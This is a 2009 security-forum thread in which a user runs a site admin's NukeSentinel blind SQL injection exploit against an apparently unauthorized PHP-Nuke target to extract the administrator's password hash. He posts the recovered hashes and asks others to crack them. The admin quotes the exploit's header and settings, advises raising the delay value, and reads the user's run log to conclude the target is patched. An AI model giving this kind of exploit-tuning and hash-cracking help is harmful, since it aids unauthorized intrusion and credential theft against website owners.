|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 79
Members: 0
Total: 79
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
MD5 from outdated Sentinel |
|
Posted: Wed Mar 25, 2009 8:51 pm |
|
|
rager |
Beginner |
|
|
Joined: Mar 25, 2009 |
Posts: 4 |
|
|
|
|
|
|
|
I ran the script made by the admin, for some reason it usually fails. However, after many times of trying, I managed to get an MD5
5436b1c57ccbc13a172bba16d5b0ea26
and after some more time i tried again and got a new md5, odd is it not?
114ca4db005102435aa44d3a2bb0d3b0
and then I tried again after many failures and got another md5
a8c632c266abbedd8faef3e5ddddc2c2
Are these MD5s even the right ones? If so, can someone crack em? I tried cracking em with a 25gb list, no luck. |
|
|
|
|
|
|
|
|
Posted: Wed Mar 25, 2009 8:58 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
What script did you use? I assume, that it's works via delay-based blind sql injection, so yes, you may get invalid results, if server or network connection is slow or unstable. You can try to increase delay value, this may help. Anyway, correct result must be repeatable, you must get exactly the same hash every time or it is not working correctly. |
|
|
|
|
Posted: Wed Mar 25, 2009 9:03 pm |
|
|
rager |
Beginner |
|
|
Joined: Mar 25, 2009 |
Posts: 4 |
|
|
|
|
|
|
|
used your script bud. ive gotten the has to be 0000000000000 more often than any other MD5. which is 2x but i dont think thats right. |
|
|
|
|
|
|
|
|
Posted: Wed Mar 25, 2009 9:48 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
You mean this exploit:
Code: |
// NukeSentinel 2.5.11 "nsbypass.php" sql injection blind fishing exploit
// written by Janek Vind "waraxe"
// http://www.waraxe.us/
// 23. april 2008
//
// This exploit will fetch phpnuke God admin password's md5 hash
// Ref: waraxe-2007-SA#053
// http://www.waraxe.us/advisory-53.html
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//=====================================================================
$url = 'http://localhost/phpnuke.7.9/includes/nsbypass.php';
$outfile = './attack_log.txt';// Log file
$testcnt = 300000;// Use bigger numbers, if server is slow, default is 300000
//======================================================================
...
...
|
Try to change this variable:
Code: |
$testcnt = 300000;// Use bigger numbers, if server is slow, default is
|
For example:
Code: |
$testcnt = 1000000;
|
You should see bigger delays from server.
By the way - target can be patched allready, in that case exploit will obviously not work. |
|
|
|
|
|
|
|
|
Posted: Wed Mar 25, 2009 10:14 pm |
|
|
rager |
Beginner |
|
|
Joined: Mar 25, 2009 |
Posts: 4 |
|
|
|
|
|
|
|
Code: | ....includes/nsbypass.php testing probe delays 4 2 2 2 2 2 mean nondelayed - 2 dsecs mean delayed - 2 dsecs normal delay: 2 deciseconds finding hash now ... char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got hash pos 1 --> 0 current value for hash: 0 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got hash pos 2 --> 0 current value for hash: 00 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got hash pos 3 --> 0 current value for hash: 000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got hash pos 4 --> 0 current value for hash: 0000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got hash pos 5 --> 0 current value for hash: 00000 test_condition() - try 1 - invalid return value ... trying again - try 2 ... test_condition() - try 2 - invalid return value ... trying again - try 3 ... test_condition() - try 3 - invalid return value ... trying again - try 4 ... test_condition() - try 4 - invalid return value ... trying again - try 5 ... test_condition() - try 5 - invalid return value ... trying again - try 6 ... test_condition() - try 6 - invalid return value ... trying again - try 7 ... test_condition() - try 7 - invalid return value ... trying again - try 8 ... test_condition() - try 8 - invalid return value ... trying again - try 9 ... test_condition() - try 9 - invalid return value ... trying again - try 10 ... test_condition() - try 10 - invalid return value ... too many tries - exiting ... |
This happens very frequently. I acutally got very frustrated and started making the value 99999999999999999999999999999999999999999. lol. I'll keep you updated. |
|
|
|
|
|
|
|
|
Posted: Thu Mar 26, 2009 12:23 am |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Code: |
mean nondelayed - 2 dsecs
mean delayed - 2 dsecs
|
As you can see - both response times are the same, about 200 ms.
So this security vulnerability is patched and specific exploit does not work. |
|
|
|
|
Posted: Thu Mar 26, 2009 12:35 am |
|
|
rager |
Beginner |
|
|
Joined: Mar 25, 2009 |
Posts: 4 |
|
|
|
|
|
|
|
thanks for the feedback. |
|
|
|
|
www.waraxe.us Forum Index -> MD5 hashes
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|